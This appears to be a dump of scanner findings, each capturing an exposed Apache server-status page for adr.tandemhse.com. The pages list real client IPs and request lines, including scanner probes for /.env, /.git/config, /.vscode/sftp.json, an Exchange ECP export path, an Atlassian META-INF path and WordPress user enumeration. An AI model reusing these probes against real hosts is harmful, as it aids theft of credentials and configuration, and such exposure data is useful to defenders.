26.9139221135111270.05.33613.56 79.155.252.122h2relehse.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 2-47312653630/188/25376_ 26.77591907129063670.03.40585.83 172.64.238.49h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-47312653660/490/30534_ 32.2553017148324560.06.27742.76 185.38.129.94h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-47312653660/303/29750_ 32.12590112151966200.07.42779.45 207.154.197.113http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-47312653660/332/30880_ 32.13590146184149890.03.99669.23 207.154.197.113http/1.1barrerasdecontencion.com:443GET /telescope/requests HTTP/1.1 3-47312653660/331/30512_ 32.205950223288570.05.08728.90 172.68.134.145h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-47312653660/500/30390_ 31.93590790164928280.019.73681.88 172.71.102.35h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-47312653660/453/30657_ 32.205950161939800.06.55720.42 188.114.111.162h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-47312653660/397/30039_ 31.76310157914200.04.39794.36 198.74.56.46http/1.1 3-47312653660/325/29606_ 31.94525462157958840.03.43634.34 172.71.102.34h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-47312653660/310/28717_ 32.1752527174416500.04.97631.93 162.158.130.39h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-47312653660/406/29644_ 32.46310163089420.06.44749.47 198.74.56.46http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-47312653650/306/32451_ 32.7610212531250.06.94834.45 159.89.12.166h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-47312653650/444/32862_ 32.8720156477350.06.382163.95 159.89.12.166http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-47312653650/387/31789_ 32.8700158164500.018.61713.71 159.89.12.166http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-47312653650/280/31836_ 32.8720154127840.04.18630.26 159.89.12.166http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-47312653650/328/31712_ 32.750463203846770.05.92783.79 172.64.238.118h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 4-47312653650/429/30731_ 32.771
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c755dea9464c
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 09-Mar-2024 19:12:15 CET Restart Time: Wednesday, 31-Jan-2024 10:42:58 CET Parent Server Config. Generation: 357 Parent Server MPM Generation: 356 Server uptime: 38 days 8 hours 29 minutes 16 seconds Server load: 0.21 0.09 0.03 Total accesses: 1056836 - Total Traffic: 31.3 GB - Total Duration: 608951438 CPU Usage: u99.6 s139.35 cu5591.14 cs4110.68 - .3% CPU load .319 requests/sec - 9.9 kB/second - 31.0 kB/request - 576.202 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0645356no1yes19000 1645358no1yes010000 2645355no0yes19000 3645487no1yes010000 4645357no0yes010000 Sum503 248000 ______W__________________R________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3566453560/3/19520_ 0.020088728310.00.00520.80 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-3566453560/4/19239_ 0.0200115014380.00.01472.63 64.226.78.121http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-3566453560/0/19230_ 0.00058144048080.00.00573.13 64.226.78.121h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-3566453560/1/19051_ 0.0200107938300.00.00465.11 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-3566453560/0/19141_ 0.000084803090.00.00505.83 138.68.86.32h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-3566453560/2/18675_ 0.020084425450.00.01445.53 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-3566453560/3/18852W 0.020096830290.00.00385.98 64.226.78.121http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-3566453560/2/18572_ 0.0200208162450.00.00462.27 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 0-3566453560/1/19632_ 0.0200131753920.00.00447.70 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 0-3566453560/1/19732_ 0.020064033770.00.001882.29 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 1-3566453580/2/20621_ 0.020095189340.00.00501.11 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 1-3566453580/2/20651_ 0.0200140505260.00.00481.67 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 1-3566453580/1/20129_ 0.020074158640.00.00479.98 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 1-3566453580/2/20591_ 0.020099212360.00.00555.97 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 1-3566453580/1/20324_ 0.0100269680970.00.00501.67 64.226.78.121http/1.1 1-3566453580/1/19236_ 0.0200206818140.00.00552.14 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-3566453580/1/20811_ 0.0200113602740.00.00595.56 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 1-3566453580/2/20770_ 0.0200144465940.00.00425.79 64.226.78.121http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-3566453580/1/21652_ 0.0100146801760.00.00582.78 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 1-3566453580/0/20453_ 0.00063108981600.00.00479.68 138.68.86.32h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-3566453550/2/18888_ 0.0100127167930.00.00418.89 64.226.78.121http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-3566453550/1/20336_ 0.0100114692560.00.00517.00 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 2-3566453550/1/20510_ 0.0000129126950.00.00505.84 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 2-3566453550/1/20158_ 0.0100127517460.00.001883.35 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-3566453550/0/20209_ 0.00060108661580.00.00565.89 64.23.212.125http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 2-3566453550/2/19757R 0.0000134522190.00.00493.91 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 2-3566453550/1/19655_ 0.0000105630040.00.001873.70 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-3566453550/2/19870_ 0.010070079540.00.00565.02 64.226.78.121http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-3566453550/2/20009_ 0.0100117512350.00.00509.52 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 2-3566453550/1/19455_ 0.0100111907650.00.00478.93 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 3-3566454870/2/22412_ 0.0200101116210.00.01595.41 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-3566454870/2/22000_ 0.020096124110.00.00625.30 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-3566454870/0/23004_ 0.00085135016330.00.00507.72 64.23.212.125http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 3-3566454870/1/22239_ 0.0200139742460.00.00546.30 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-3566454870/0/22444_ 0.00065111164380.00.00473.56 64.226.78.121h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-3566454870/0/22465_ 0.0006395753970.00.00599.52 138.68.86.32h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-3566454870/1/21756_ 0.0200117922550.00.00602.61 64.226.78.121http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-3566454870/0/21743_ 0.0006297066230.00.00501.78 64.226.78.121http/1.1 3-3566454870/0/21155_ 0.00047100215810.00.00472.46 64.226.78.121http/1.1 3-3566454870/0/21600_ 0.00030116885890.00.00611.64 138.68.86.32http/1.1 4-3566453570/2/24505_ 0.0000163875960.00.00675.21 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 4-3566453570/1/24463_ 0.0000124830070.00.002031.07 138.68.86.32http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-3566453570/2/23642_ 0.0000129712100.00.00580.79 46.101.111.185http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 4-3566453570/1/24615_ 0.000089883000.00.00514.92 64.226.78.121http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-3566453570/1/23561_ 0.0000153093930.00.00588.80 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-3566453570/0/23136_ 0.00061137032180.00.00517.73 64.23.212.125http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 4-3566453570/2/24227_ 0.020
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c755bf89c5fb
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 08-Mar-2024 07:39:29 CET Restart Time: Wednesday, 31-Jan-2024 10:42:58 CET Parent Server Config. Generation: 334 Parent Server MPM Generation: 333 Server uptime: 36 days 20 hours 56 minutes 30 seconds Server load: 0.03 0.06 0.04 Total accesses: 1029119 - Total Traffic: 30.5 GB - Total Duration: 587639912 CPU Usage: u117.94 s153.82 cu5361.41 cs3916.14 - .3% CPU load .323 requests/sec - 10.1 kB/second - 31.1 kB/request - 571.013 ms/request 3 requests currently being processed, 47 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0550439no0yes010000 1550442no0yes28000 2550575no0yes010000 3550440no0yes010000 4550441no0yes19000 Sum500 347000 ______________W____R__________________________R___ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3335504390/11/19136_ 5.17121087454850.00.31499.19 195.2.78.230http/1.1 0-3335504390/8/18799_ 6.761160113642920.00.04463.59 27.124.44.37http/1.1relehse.com:80GET /login.php?s=Admin/login HTTP/1.1 0-3335504390/9/18905_ 5.192020143015930.00.07540.09 188.114.111.10h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3335504390/5/18692_ 5.9920220106932420.00.09456.69 27.124.44.37http/1.1 0-3335504390/6/18813_ 6.7012429783820030.00.06497.54 46.24.53.33h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-3335504390/13/18343_ 7.211164083412530.00.59439.53 104.200.151.180h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3335504390/9/18465_ 7.251247395743020.00.19378.28 185.220.101.72http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 0-3335504390/17/18259_ 7.231681207275280.00.08440.44 103.23.61.80http/1.1barrerasdecontencion.com:443POST /wp-cron.php?doing_wp_cron=1709879800.93053793907165527343 0-3335504390/12/19218_ 7.1516866130631580.00.43438.88 150.95.31.43http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 0-3335504390/8/19333_ 7.26121062949430.00.031874.96 172.64.236.111h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3335504420/116/20322_ 10.9527790760190.02.05497.73 165.227.39.235http/1.1 1-3335504420/91/20279_ 11.0510139613080.01.47474.75 165.227.39.235http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-3335504420/99/19568_ 10.9342371496770.01.26471.69 165.227.39.235h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-3335504420/97/20164_ 10.9705698168670.01.63549.49 185.220.101.72http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3335504420/103/19598W 11.0400193951460.02.79495.33 165.227.39.235http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-3335504420/86/18674_ 10.982808204718380.01.05545.51 165.227.39.235http/1.1 1-3335504420/102/20156_ 10.7541118103213260.01.03586.91 46.24.53.33h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3335504420/105/20411_ 10.673919141017220.01.52419.39 165.227.39.235http/1.1 1-3335504420/102/21128_ 10.9840145872880.01.85576.36 165.227.39.235h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-3335504420/95/19995R 10.8900108357790.00.99472.43 172.70.127.136h2tandemsl.com:443GET /wp-includes/php-compat/plugins.php HTTP/2.0 2-3335505750/21/18194_ 7.3279506124686970.00.24404.95 172.70.126.201h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3335505750/27/19660_ 7.671270103714590.00.21505.84 172.68.134.108h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3335505750/23/19756_ 5.29800122104880.00.52493.74 27.124.44.37http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3335505750/27/19582_ 5.731271035123289900.00.511869.54 162.158.114.2h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3335505750/23/19556_ 7.501220104507390.00.39539.35 172.70.174.53h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3335505750/24/19148_ 7.1512281131041660.00.48477.78 85.10.136.32http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3335505750/32/18946_ 6.901560101840640.00.541860.56 188.114.111.13h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3335505750/22/19281_ 7.66161157664796730.00.20538.01 172.64.236.44h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3335505750/29/19377_ 7.6985343114737580.00.26472.54 172.71.151.110h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3335505750/30/18822_ 7.3415629109590760.00.33464.62 172.70.174.56h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3335504400/98/21715_ 10.242098596550.01.02583.24 165.227.39.235http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-3335504400/94/21321_ 10.240089192100.01.16614.98 165.227.39.235http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-3335504400/96/22366_ 10.2410132536210.01.70496.65 165.227.39.235http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-3335504400/102/21390_ 10.153497136893760.01.58520.05 165.227.39.235h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-3335504400/84/21655_ 10.2400108815160.01.45450.74 165.227.39.235http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-3335504400/95/21526_ 10.18333593210170.00.90571.34 165.227.39.235h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-3335504400/92/20994_ 10.12077114707350.01.25579.07 165.227.39.235http/1.1 3-3335504400/108/21061_ 10.241094247920.02.15490.32 165.227.39.235http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-3335504400/89/20487_ 10.16294697069330.00.85460.22 172.69.151.173h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3335504400/88/20841_ 10.2421114230190.02.50596.13 165.227.39.235http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-3335504410/12/23995_ 6.271161015161878030.00.26647.32 172.70.126.122h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3335504410/17/23964_ 7.261210122555680.01.082017.48 172.64.236.45h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3335504410/11/23132_ 6.06182118127566950.00.30549.63 34.220.44.154h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3335504410/12/24019_ 6.3912140787301380.00.22484.88 172.71.99.12h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3335504410/10/23029_ 5.1918260150980440.00.10563.68 139.162.141.82http/1.1 4-3335504410/4/22637_ 5.1918210134663600.00.03501.21 172.68.26.243h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3335504410/11/23785R 6.4900132962750.00.33
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c7558ab6ff27
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 02-Feb-2024 07:43:04 CET Restart Time: Wednesday, 31-Jan-2024 10:42:58 CET Parent Server Config. Generation: 10 Parent Server MPM Generation: 9 Server uptime: 1 day 21 hours 5 seconds Server load: 0.06 0.09 0.05 Total accesses: 57528 - Total Traffic: 1.7 GB - Total Duration: 25190998 CPU Usage: u15.44 s15.26 cu266.16 cs189.38 - .3% CPU load .355 requests/sec - 10.7 kB/second - 30.1 kB/request - 437.891 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02904681no0yes010000 12904814no1yes19000 22904682no0yes010000 32904683no0yes010000 42904684no0yes010000 Sum501 149000 __________________W_______________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-929046810/13/969_ 2.971483404923730.00.4131.38 172.69.223.173h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-929046810/11/841_ 3.021533452558010.00.4315.92 172.69.223.161h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-929046810/12/883_ 2.8733558972950.00.1913.84 138.197.88.136http/1.1 0-929046810/9/885_ 2.9414315710780090.00.1216.37 172.71.122.205h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 0-929046810/12/1018_ 2.921513246071000.00.3147.39 172.71.131.55h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-929046810/15/1006_ 3.0211704242830.00.1147.22 141.101.68.129h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-929046810/12/949_ 3.0414314108160.00.0639.83 103.23.61.80http/1.1barrerasdecontencion.com:443POST /wp-cron.php?doing_wp_cron=1706856040.62280201911926269531 0-929046810/10/874_ 2.991483994158450.00.1112.27 172.69.223.173h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-929046810/11/1024_ 2.9215130855599790.00.1236.99 172.71.131.55h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-929046810/14/1032_ 3.10104218750.00.1745.12 138.197.88.136http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-929048140/61/1597_ 5.2121487340280.00.7942.98 138.197.88.136http/1.1 1-929048140/48/1679_ 5.36004904790.02.3161.53 138.197.88.136http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-929048140/87/1592_ 5.2123544185960.00.6327.44 138.197.88.136h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-929048140/50/1755_ 5.3104916429480.00.9731.80 162.158.95.40h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-929048140/42/1532_ 5.27315329740.013.1874.28 138.197.88.136h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-929048140/99/1654_ 5.2739073451470.00.6065.57 138.197.88.136h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-929048140/54/1657_ 5.33303842130.00.7148.75 138.197.88.136h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-929048140/87/1795_ 5.3423224541700.01.8629.67 138.197.88.136http/1.1 1-929048140/51/1643W 5.28004282630.01.4427.55 138.197.88.136http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-929048140/110/1708_ 5.36006151460.02.5038.44 138.197.88.136http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-929046820/13/795_ 3.042091681991730.00.1913.69 172.71.123.39h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-929046820/7/724_ 3.072141701716780.00.0445.15 172.71.131.55h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-929046820/10/895_ 2.7225502021280.00.2422.05 172.64.236.67h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-929046820/9/977_ 2.7125302179290.00.0444.98 172.64.236.148h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-929046820/12/998_ 2.5425501986560.00.6620.08 172.70.86.43h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-929046820/5/1053_ 3.032093512150310.00.1615.56 172.71.126.186h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-929046820/15/985_ 3.032091264303940.00.6245.82 172.71.126.186h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-929046820/8/825_ 2.7525302015800.00.1726.14 136.226.0.171http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-929046820/15/922_ 3.062163683464890.01.3820.26 172.71.131.55h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-929046820/11/941_ 2.962531642046150.00.1267.16 172.69.222.102h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-929046830/107/1168_ 5.0939233055150.01.0937.07 185.247.170.178h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-929046830/48/1150_ 5.0539222760660.013.3129.53 185.247.170.178h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-929046830/116/1179_ 5.15102756790.00.7819.58 138.197.88.136http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-929046830/52/1129_ 5.122122692690.00.6533.91 138.197.88.136h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-929046830/94/1155_ 5.1301942780520.00.8517.68 172.64.238.34h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-929046830/64/1107_ 5.15002781110.00.5232.51 138.197.88.136http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-929046830/70/1119_ 4.9933662817650.01.1044.38 138.197.88.136http/1.1 3-929046830/54/1241_ 4.9633262988460.01.0935.96 138.197.88.136http/1.1 3-929046830/37/1091_ 5.06351702725790.00.6333.36 172.71.131.99h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-929046830/38/1076_ 5.1035273750910.00.8136.65 185.247.170.178h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-929046840/11/1050_ 2.94105040260.00.1746.84 138.197.88.136http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-929046840/10/1040_ 2.881914166248830.00.0823.79 172.69.223.173h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-929046840/9/1054_ 2.781844133572350.00.2820.08 172.71.122.193h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-929046840/12/1189_ 2.871933122993000.00.2319.01 172.69.223.173h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-929046840/8/1132_ 2.85222313831160.00.0622.14 185.247.170.178h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-929046840/6/977_ 2.5621704487440.00.0517.67 66.249.66.169http/1.1 4-929046840/8/1253_ 2.8221703685470.00.0532.10 66.249.66.169http/1.1barrerasdecontencion.com:80done, streams: 0/1/1/0/0 (open/recv/
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c75583dd04e1
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Tuesday, 09-Jan-2024 15:14:33 CET Restart Time: Friday, 29-Dec-2023 10:21:12 CET Parent Server Config. Generation: 68 Parent Server MPM Generation: 67 Server uptime: 11 days 4 hours 53 minutes 20 seconds Server load: 0.02 0.06 0.01 Total accesses: 318420 - Total Traffic: 6.0 GB - Total Duration: 123046805 CPU Usage: u26.86 s37.11 cu1519.92 cs1077.26 - .275% CPU load .329 requests/sec - 6.5 kB/second - 19.8 kB/request - 386.429 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01691622no0yes010000 11691620no0yes010000 21691751no1yes010000 31691621no0yes19000 41691619no2yes19000 Sum503 248000 _________________________________R_______________W Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-6716916220/1/7082_ 0.01078337701640.00.03122.11 172.70.57.176h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-6716916220/2/7416_ 0.040025827300.00.00130.38 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-6716916220/1/7463_ 0.040027088000.00.01118.22 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-6716916220/2/7545_ 0.040035748250.00.00157.64 139.144.150.45http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 0-6716916220/1/7488_ 0.040024590460.00.00133.18 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 0-6716916220/1/7321_ 0.030028140730.00.00118.21 